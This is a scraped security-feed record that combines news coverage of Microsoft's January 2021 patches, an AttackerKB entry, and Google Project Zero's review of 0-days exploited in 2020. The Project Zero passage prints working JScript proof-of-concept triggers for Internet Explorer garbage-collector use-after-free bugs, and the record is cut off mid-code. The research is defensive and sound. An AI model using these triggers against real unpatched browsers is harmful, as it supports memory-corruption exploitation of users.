[Twitter](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T05:01:00", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "modified": "2021-01-13T05:01:20", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-01-13T02:27:43", "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\n\n\nMost concerning of this month's batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft's default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it's not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n"It could be as simple as sending a file," he said. 
"The user doesn't need to interact with anything, as Defender will access it as soon as it is placed on the system."\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2020-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n"They classify this vulnerability as 'low' in complexity, meaning an attack could be easy to reproduce," Breen said. "However, they also note that it\u2019s 'less likely' to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us."\n\nCVE-2020-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft's less-dire "important" ratings, which is not to say they're much less of a security concern. 
Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an "elevation of privilege" flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n"Unfortunately, this type of vulnerability is often quickly exploited by attackers," Liska said. "For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching."\n\n**Trend Micro's ZDI Initiative** pointed out another flaw marked "important" -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n"It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch," ZDI's **Dustin Childs** said. "The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft's update cycle from last month removed the program from Microsoft's browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. 
If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I've used previously and are worth a look.\n\nThat said, there don't appear to be any major issues cropping up yet with this month's update batch. 
But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T01:32:20", "type": "krebs", "title": "Microsoft Patch Tuesday, January 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "modified": "2021-01-13T01:32:20", "id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-13T05:41:44", 
"description": "Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its [January Patch Tuesday roundup of fixes](<https://msrc.microsoft.com/update-guide>). In total it patched 83 vulnerabilities.\n\nThe most serious bug is a flaw in Microsoft\u2019s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users who have not connected to internet recently and received an auto-update, should patch now.\n\n\u201cThis bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you\u2019ll need to manually apply the patch,\u201d wrote Dustin Childs, Trend Micro\u2019s Zero Day Initiative (ZDI) security manager. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers believe the vulnerability, [tracked as CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), has been exploited for the past three months and was leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>). Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.\n\nAffected versions of Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and 2004 Windows Server, [according t](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)o the security bulletin.\n\n## **Publicly Known Bug Fixed Twice **\n\nMicrosoft patched a second vulnerability, that researchers believe was also being exploited in the wild, tracked as [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>). 
The flaw is classified as an elevation-of-privilege bug and impacts the Windows [print driver process SPLWOW64.exe](<https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p>).\n\nThe bug was first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI re-discovered the flaw a second time, which Microsoft patched again Tuesday.\n\n\u201cThe previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,\u201d Childs wrote in a prepared [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review>).\n\n## **Additional Critical Bugs **\n\nEight additional bugs rated critical were also part of Microsoft\u2019s Tuesday vulnerability fixes.\n\nThese included a remote code-execution bug in Microsoft\u2019s Edge web browser. The vulnerability (CVE-2021-1705) is memory-related and tied to the way the browser improperly accesses objects in memory.\n\n\u201cSuccessful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. \u201cIf the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. 
An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.\u201d\n\nAdditional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).\n\nFive January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevation of privileges, run a specially crafted application and take complete control of the targeted system.\n\n\u201cWith the SolarWinds breach still fresh from December and the scope of impact growing by the day, there\u2019s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,\u201d Knapp wrote. \u201cWhether it\u2019s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. 
Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-12T21:45:23", "type": "threatpost", "title": "Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1643", "CVE-2020-1668", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1673", "CVE-2021-1705"], "modified": "2021-01-12T21:45:23", "id": "THREATPOST:B879E243998561911585BBD37B7F33E9", "href": "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}], "attackerkb": [{"lastseen": "2022-09-04T08:04:27", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. 
This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\n**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-0986", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "modified": "2020-07-24T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-07-30T19:23:21", "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. 
Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. 
The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. 
Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\n\nProduct\n\n| \n\nVulnerability exploited in-the-wild\n\n| \n\nVariant of... \n \n---|---|--- \n \nMicrosoft Internet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2018-8653* CVE-2019-1367* CVE-2019-1429* \n \nMozilla Firefox\n\n| \n\nCVE-2020-6820\n\n| \n\nMozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) \n \nGoogle Chrome\n\n| \n\nCVE-2020-6572\n\n| \n\nCVE-2019-5870\n\nCVE-2019-13695 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2019-0880* \n \nGoogle Chrome/Freetype\n\n| \n\nCVE-2020-15999\n\n| \n\nCVE-2014-9665 \n \nApple Safari\n\n| \n\nCVE-2020-27930\n\n| \n\nCVE-2015-0093 \n \n* vulnerability was also exploited in-the-wild in previous years \n \n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. 
Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i < 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. 
create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i < 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i < 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. 
The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. 
For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. 
